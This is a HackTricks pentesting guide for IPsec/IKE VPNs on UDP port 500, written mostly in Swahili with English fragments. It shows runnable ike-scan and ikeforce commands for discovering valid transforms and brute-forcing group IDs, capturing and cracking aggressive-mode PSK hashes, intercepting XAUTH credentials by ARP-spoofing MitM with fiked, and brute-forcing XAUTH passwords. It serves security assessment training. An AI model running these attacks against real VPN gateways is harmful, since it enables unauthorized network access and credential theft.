# 500/udp - Pentesting IPsec/IKE VPN

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
{% endhint %}

## Basic Information

**IPsec** inatambulika sana kama teknolojia kuu ya kulinda mawasiliano kati ya mitandao (LAN-to-LAN) na kutoka kwa watumiaji wa mbali hadi lango la mtandao (remote access), ikihudumu kama msingi wa suluhisho za VPN za biashara.

Kuanzishwa kwa **ushirikiano wa usalama (SA)** kati ya pointi mbili kunasimamiwa na **IKE**, ambayo inafanya kazi chini ya kivuli cha ISAKMP, protokali iliyoundwa kwa ajili ya uthibitishaji na kubadilishana funguo. Mchakato huu unafanyika katika hatua kadhaa:

* **Hatua ya 1:** Kituo salama kinaundwa kati ya mwisho mbili. Hii inapatikana kupitia matumizi ya Funguo za Kwanza za Kushiriki (PSK) au vyeti, ikitumia hali kuu, ambayo inajumuisha jozi tatu za ujumbe, au **hali ya shambulio**.
* **Hatua ya 1.5:** Ingawa si ya lazima, hatua hii, inayojulikana kama Hatua ya Uthibitishaji wa Kupanuliwa, inathibitisha utambulisho wa mtumiaji anayejaribu kuungana kwa kuhitaji jina la mtumiaji na nenosiri.
* **Hatua ya 2:** Hatua hii inajitolea kwa kujadili vigezo vya kulinda data kwa kutumia **ESP** na **AH**. Inaruhusu matumizi ya algorithimu tofauti na zile katika Hatua ya 1 ili kuhakikisha **Perfect Forward Secrecy (PFS)**, ikiongeza usalama.

**Bandari ya kawaida:** 500/udp

## **Gundua** huduma kwa kutumia nmap
```
root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT    STATE SERVICE
500/udp open  isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
```
## **Kupata mabadiliko halali**

Mipangilio ya IPSec inaweza kuandaliwa ili kukubali mabadiliko moja au machache tu. Mabadiliko ni mchanganyiko wa thamani. **Kila mabadiliko** ina idadi ya sifa kama DES au 3DES kama **algorithimu ya usimbaji**, SHA au MD5 kama **algorithimu ya uaminifu**, funguo zilizoshirikiwa kabla kama **aina ya uthibitishaji**, Diffie-Hellman 1 au 2 kama **algorithimu ya usambazaji wa funguo** na sekunde 28800 kama **muda wa maisha**.

Basi, jambo la kwanza unalopaswa kufanya ni **kupata mabadiliko halali**, ili server ikuzungumze. Ili kufanya hivyo, unaweza kutumia chombo **ike-scan**. Kwa default, Ike-scan inafanya kazi katika hali kuu, na inatuma pakiti kwa lango lenye kichwa cha ISAKMP na pendekezo moja lenye **mabadiliko nane ndani yake**.

Kulingana na jibu unaweza kupata taarifa fulani kuhusu mwisho:
```
root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
```
As you can see in the previous response, there is a field called **AUTH** with the value **PSK**. This means that the vpn is configured using a preshared key (and this is really good for a pentester).\
**The value of the last line is also very important:**

* _0 returned handshake; 0 returned notify:_ Hii inamaanisha kwamba lengo **si lango la IPsec**.
* _**1 returned handshake; 0 returned notify:**_ Hii inamaanisha kwamba **lengo limewekwa kwa IPsec na linataka kufanya mazungumzo ya IKE, na moja au zaidi ya mabadiliko uliyopendekeza yanakubalika** (mabadiliko halali yataonyeshwa katika matokeo).
* _0 returned handshake; 1 returned notify:_ Lango la VPN linajibu kwa ujumbe wa notify wakati **hakuna mabadiliko yanayokubalika** (ingawa baadhi ya lango halijibu, katika kesi hiyo uchambuzi zaidi na pendekezo lililosasishwa linapaswa kujaribiwa).

Then, in this case we already have a valid transformation but if you are in the 3rd case, then you need to **brute-force a little bit to find a valid transformation:**

First of all you need to create all the possible transformations:
```bash
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done
```
Na kisha fanya brute-force kila moja kwa kutumia ike-scan (hii inaweza kuchukua dakika kadhaa):
```bash
while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
```
Ikiwa brute-force haikufanya kazi, labda seva inajibu bila mikono hata kwa mabadiliko halali. Kisha, unaweza kujaribu brute-force hiyo hiyo lakini ukitumia hali ya shinikizo:
```bash
while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt
```
Hopefully **mabadiliko halali yanarudishwa**.\
You can try the **shambulio sawa** using [**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py).\
You could also try to brute force transformations with [**ikeforce**](https://github.com/SpiderLabs/ikeforce):
```bash
./ikeforce.py <IP> # No parameters are required for scan -h for additional help
```
![](<../.gitbook/assets/image (617).png>)

Katika **DH Group: 14 = 2048-bit MODP** na **15 = 3072-bit**\
**2 = HMAC-SHA = SHA1 (katika kesi hii). Muundo wa `--trans` ni $Enc,$Hash,$Auth,$DH**

Cisco inaonyesha kuepuka kutumia vikundi vya DH 1 na 2 kwa sababu havina nguvu za kutosha. Wataalamu wanaamini kwamba **nchi zenye rasilimali nyingi zinaweza kwa urahisi kuvunja usimbaji** wa data inayotumia vikundi hivi dhaifu. Hii inafanywa kwa kutumia mbinu maalum inayowandaa kuvunja misimbo kwa haraka. Ingawa inagharimu pesa nyingi kuanzisha mbinu hii, inawawezesha nchi hizi zenye nguvu kusoma data iliyosimbwa kwa wakati halisi ikiwa inatumia kundi ambalo si imara (kama 1,024-bit au ndogo).

### Ufuatiliaji wa seva

Kisha, unaweza kutumia ike-scan kujaribu **kujua muuzaji** wa kifaa. Chombo kinatuma pendekezo la awali na kusitisha kurudi nyuma. Kisha, itachambua **tofauti** ya **wakati** **kati ya** **ujumbe** ulipokelewa kutoka kwa seva na muundo wa majibu unaolingana, pentester anaweza kwa mafanikio kufuatilia muuzaji wa VPN gateway. Zaidi ya hayo, baadhi ya seva za VPN zitatumia **Vendor ID (VID) payload** ya hiari pamoja na IKE.

**Taja mabadiliko halali ikiwa inahitajika** (ukitumia --trans)

Ikiwa IKE itagundua ni nani muuzaji, itachapisha:
```
root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

IKE Backoff Patterns:

IP Address       No.  Recv time            Delta Time
172.16.21.200    1    1322286031.744904    0.000000
172.16.21.200    2    1322286039.745081    8.000177
172.16.21.200    3    1322286047.745989    8.000908
172.16.21.200    4    1322286055.746972    8.000983
172.16.21.200    Implementation guess: Cisco VPN Concentrator

Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
```
Hii inaweza pia kufanywa kwa kutumia nmap script _**ike-version**_

## Kutafuta ID sahihi (jina la kundi)

Ili kuruhusiwa kukamata hash unahitaji mabadiliko halali yanayounga mkono Aggressive mode na ID sahihi (jina la kundi). Huenda usijue jina halali la kundi, hivyo itabidi ulipue kwa nguvu.\
Ili kufanya hivyo, ningependekeza njia 2:

### Kupiga ID kwa nguvu na ike-scan

Kwanza kabisa jaribu kufanya ombi na ID bandia ukijaribu kukusanya hash ("-P"):
```bash
ike-scan -P -M -A -n fakeID <IP>
```
Ikiwa **hakuna hash inayorejeshwa**, basi labda njia hii ya brute forcing itafanya kazi. **Ikiwa hash fulani inarejeshwa, hii inamaanisha kwamba hash ya uwongo itatumwa kwa ID ya uwongo, hivyo njia hii haitakuwa ya kuaminika** katika brute-force ID. Kwa mfano, hash ya uwongo inaweza kurejeshwa (hii inatokea katika matoleo ya kisasa):

![](<../.gitbook/assets/image (917).png>)

Lakini kama nilivyosema, ikiwa hakuna hash inayorejeshwa, basi unapaswa kujaribu brute-force majina ya vikundi vya kawaida kwa kutumia ike-scan.

Hii script **itajaribu brute-force IDs zinazowezekana** na itarejesha IDs ambapo handshake halali inarejeshwa (hii itakuwa jina halali la kundi).

Ikiwa umepata mabadiliko maalum, ongeza katika amri ya ike-scan. Na ikiwa umepata mabadiliko kadhaa, usisite kuongeza mzunguko mpya kujaribu yote (unapaswa kujaribu yote hadi moja yao ifanye kazi ipasavyo).

Unaweza kutumia [kamusi ya ikeforce](https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic) au [ile katika seclists](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/ike-groupid.txt) ya majina ya vikundi vya kawaida kujaribu kuvi-brute-force:
```bash
while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
```
Or use this dict (is a combination of the other 2 dicts without repetitions):

{% file src="../.gitbook/assets/vpnIDs.txt" %}

### Bruteforcing ID with Iker

[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py) pia inatumia **ike-scan** kubruteforce majina ya vikundi yanayoweza kuwa. Inafuata njia yake mwenyewe ya **kupata ID halali kulingana na matokeo ya ike-scan**.

### Bruteforcing ID with ikeforce

[**ikeforce.py**](https://github.com/SpiderLabs/ikeforce) ni chombo ambacho kinaweza kutumika **kubruteforce IDs pia**. Chombo hiki kitajaribu **kutitumia udhaifu tofauti** ambazo zinaweza kutumika **kuweza kutofautisha kati ya ID halali na isiyo halali** (inaweza kuwa na positives za uwongo na negatives za uwongo, ndiyo maana napendelea kutumia njia ya ike-scan ikiwa inawezekana).

Kwa kawaida **ikeforce** itatuma mwanzoni baadhi ya IDs za nasibu ili kuangalia tabia ya seva na kuamua mbinu ya kutumia.

* Njia ya **kwanza** ni kubruteforce majina ya vikundi kwa **kutafuta** taarifa ya **Dead Peer Detection DPD** ya mifumo ya Cisco (habari hii inarejelewa tu na seva ikiwa jina la kundi ni sahihi).
* Njia ya **pili** inayopatikana ni **kuangalia idadi ya majibu yaliyotumwa kwa kila jaribio** kwa sababu wakati mwingine pakiti zaidi zinatumwa wakati ID sahihi inatumika.
* Njia ya **tatu** inajumuisha **kutafuta "INVALID-ID-INFORMATION" katika jibu la ID isiyo sahihi**.
* Hatimaye, ikiwa seva haitajibu chochote kwa ukaguzi, **ikeforce** itajaribu kubruteforce seva na kuangalia ikiwa wakati ID sahihi inatumwa seva inajibu kwa pakiti fulani.\
Kwa wazi, lengo la kubruteforce ID ni kupata **PSK** unapokuwa na ID halali. Kisha, pamoja na **ID** na **PSK** utahitaji kubruteforce XAUTH (ikiwa imewezeshwa).

Ikiwa umepata mabadiliko maalum ongeza katika amri ya ikeforce. Na ikiwa umepata mabadiliko kadhaa usisite kuongeza mzunguko mpya kujaribu yote (unapaswa kujaribu yote hadi moja yao ifanye kazi ipasavyo).
```bash
git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
```

```bash
./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic
```
### Sniffing ID

(Kutoka katika kitabu **Network Security Assessment: Know Your Network**): Pia inawezekana kupata majina halali ya watumiaji kwa kunasa muunganisho kati ya mteja wa VPN na seva, kwani pakiti ya kwanza ya hali ya shambulio inayojumuisha kitambulisho cha mteja inatumwa wazi

![](<../.gitbook/assets/image (891).png>)

## Capturing & cracking the hash

Hatimaye, Ikiwa umepata **mabadiliko halali** na **jina la kundi** na ikiwa **hali ya shambulio inaruhusiwa**, basi unaweza kwa urahisi sana kupata hash inayoweza kufichuliwa:
```bash
ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor
```
The hash itahifadhiwa ndani ya _hash.txt_.

Unaweza kutumia **psk-crack**, **john** (ukitumia [**ikescan2john.py**](https://github.com/truongkma/ctf-tools/blob/master/John/run/ikescan2john.py)) na **hashcat** ili **crack** hash:
```bash
psk-crack -d <Wordlist_path> psk.txt
```
## **XAuth**

**Aggressive mode IKE** iliyounganishwa na **Pre-Shared Key (PSK)** mara nyingi inatumika kwa madhumuni ya **uthibitishaji wa kikundi**. Njia hii inapanuliwa na **XAuth (Extended Authentication)**, ambayo inatoa safu ya ziada ya **uthibitishaji wa mtumiaji**. Uthibitishaji kama huu kawaida hutumia huduma kama **Microsoft Active Directory**, **RADIUS**, au mifumo inayofanana.

Katika kuhamia kwa **IKEv2**, mabadiliko makubwa yanaonekana ambapo **EAP (Extensible Authentication Protocol)** inatumika badala ya **XAuth** kwa lengo la kuthibitisha watumiaji. Mabadiliko haya yanaonyesha maendeleo katika mbinu za uthibitishaji ndani ya itifaki za mawasiliano salama.

### MitM ya mtandao wa ndani ili kukamata akidi

Hivyo unaweza kukamata data ya kuingia kwa kutumia _fiked_ na kuona kama kuna jina la mtumiaji la kawaida (Unahitaji kuelekeza trafiki ya IKE kwa `fiked` kwa ajili ya kunusa, ambayo inaweza kufanywa kwa msaada wa ARP spoofing, [maelezo zaidi](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/)). Fiked itakuwa kama mwisho wa VPN na itakamata akidi za XAuth:
```bash
fiked -g <IP> -k testgroup:secretkey -l output.txt -d
```
Pia, kutumia IPSec jaribu kufanya shambulio la MitM na kuzuia trafiki yote kwenye bandari 500, ikiwa tunnel ya IPSec haiwezi kuanzishwa labda trafiki itatumwa wazi.

### Brute-forcing XAUTH username na password kwa ikeforce

Ili kufanya brute force **XAUTH** (wakati unajua jina halali la kundi **id** na **psk**) unaweza kutumia jina la mtumiaji au orodha ya majina ya watumiaji na orodha ya nywila:
```bash
./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]
```
Hii njia, ikeforce itajaribu kuungana kwa kutumia kila mchanganyiko wa jina la mtumiaji:nenosiri.

Ikiwa umepata moja au zaidi ya mabadiliko halali tumia tu kama katika hatua zilizopita.

## Uthibitishaji na IPSEC VPN

Katika Kali, **VPNC** inatumika kuanzisha mabomba ya IPsec. **Profaili** lazima ziwe katika saraka `/etc/vpnc/`. Unaweza kuanzisha profaili hizi kwa kutumia amri _**vpnc**_.

Amri na usanidi zifuatazo zinaonyesha mchakato wa kuanzisha muunganisho wa VPN na VPNC:
```bash
root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0
```
In this setup:

* Replace `[VPN_GATEWAY_IP]` with the actual IP address of the VPN gateway.
* Replace `[VPN_CONNECTION_ID]` with the identifier for the VPN connection.
* Replace `[VPN_GROUP_SECRET]` with the VPN's group secret.
* Replace `[VPN_USERNAME]` and `[VPN_PASSWORD]` with the VPN authentication credentials.
* `[PID]` symbolizes the process ID that will be assigned when `vpnc` initiates.

Ensure that actual, secure values are used to replace the placeholders when configuring the VPN.

## Reference Material

* [PSK cracking paper](http://www.ernw.de/download/pskattack.pdf)
* [SecurityFocus Infocus](http://www.securityfocus.com/infocus/1821)
* [Scanning a VPN Implementation](http://www.radarhack.com/dir/papers/Scanning\_ike\_with\_ikescan.pdf)
* Network Security Assessment 3rd Edition

## Shodan

* `port:500 IKE`

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
</details>
{% endhint %}